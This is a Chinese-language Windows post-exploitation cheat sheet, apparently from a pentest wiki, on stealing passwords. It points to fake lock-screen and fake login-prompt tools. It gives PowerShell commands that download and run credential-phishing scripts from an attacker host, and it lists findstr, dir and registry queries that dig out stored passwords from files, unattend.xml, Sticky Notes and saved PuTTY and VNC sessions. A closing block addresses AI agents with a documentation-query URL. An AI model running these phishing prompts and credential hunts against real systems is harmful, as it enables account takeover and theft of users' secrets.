# 密码窃取 **伪造锁屏** ``` https://github.com/Pickfordmatt/SharpLocker/releases ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/144.png) ``` https://github.com/bitsadmin/fakelogonscreen/releases ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/145.png) ``` 记录的密码保存在 %LOCALAPPDATA%\Microsoft\user.db ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/146.png) **伪造认证框** **CredsLeaker** ``` https://github.com/Dviros/CredsLeaker 将cl_reader.php,config.php,config.cl上传到web服务器 修改CredsLeaker.ps1、run.bat中URL参数 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/147.png) ``` 输入正确密码后会自动结束,否则除非结束powershell进程才可结束 获取到正确密码后会在目录下生成creds.txt保存密码信息 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/148.png) **LoginPrompt** ``` >powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-LoginPrompt.ps1');invoke-LoginPrompt" ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/149.png) ``` 除非结束进程,否则只能输对密码才能关闭对话框。 收到正确密码会返回结果 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/150.png) **Nishang-Invoke-CredentialsPhish** ``` >powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.108/ps/nishang/Gather/Invoke-CredentialsPhish.ps1'); Invoke-CredentialsPhish" ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/151.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/152.png) **搜索文件** ``` >cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt >findstr /si password *.xml *.ini *.txt *.config >findstr /spin "password" *.* ``` **搜索具有特定文件名的文件** ``` >dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* >where /R C:\ user.txt >where /R C:\ *.ini ``` **在注册表中搜索密钥和密码** ``` >REG QUERY HKLM /F "password" /t REG_SZ /S /K >REG QUERY HKCU /F "password" /t REG_SZ /S /K >reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin >reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" >reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters >reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials >reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials >reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password >reg query HKLM /f password /t REG_SZ /s >reg query HKCU /f password /t REG_SZ /s ``` **unattend.xml 中的密码** ``` unattend.xml 文件的位置 C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml 显示内容 >dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul 密码是base64编码的 >echo "base64encodepassword" | base64 -d 也可以使用msf模块来查找 post/windows/gather/enum_unattend ``` **便签密码** ``` 便签应用程序将其内容存储在位于的 sqlite 数据库中C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite ``` **应用中的密码** ``` 使用 SessionGopher获取 PuTTY、WinSCP、FileZilla、SuperPuTTY 和 RDP 密码 https://github.com/Arvanaghi/SessionGopher https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -AllDomain -o Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ``` **HASH操作模块** ``` 其他信息详见HASH操作模块 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-ti-sheng/windows-ti-quan/mi-ma-qie-qu.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.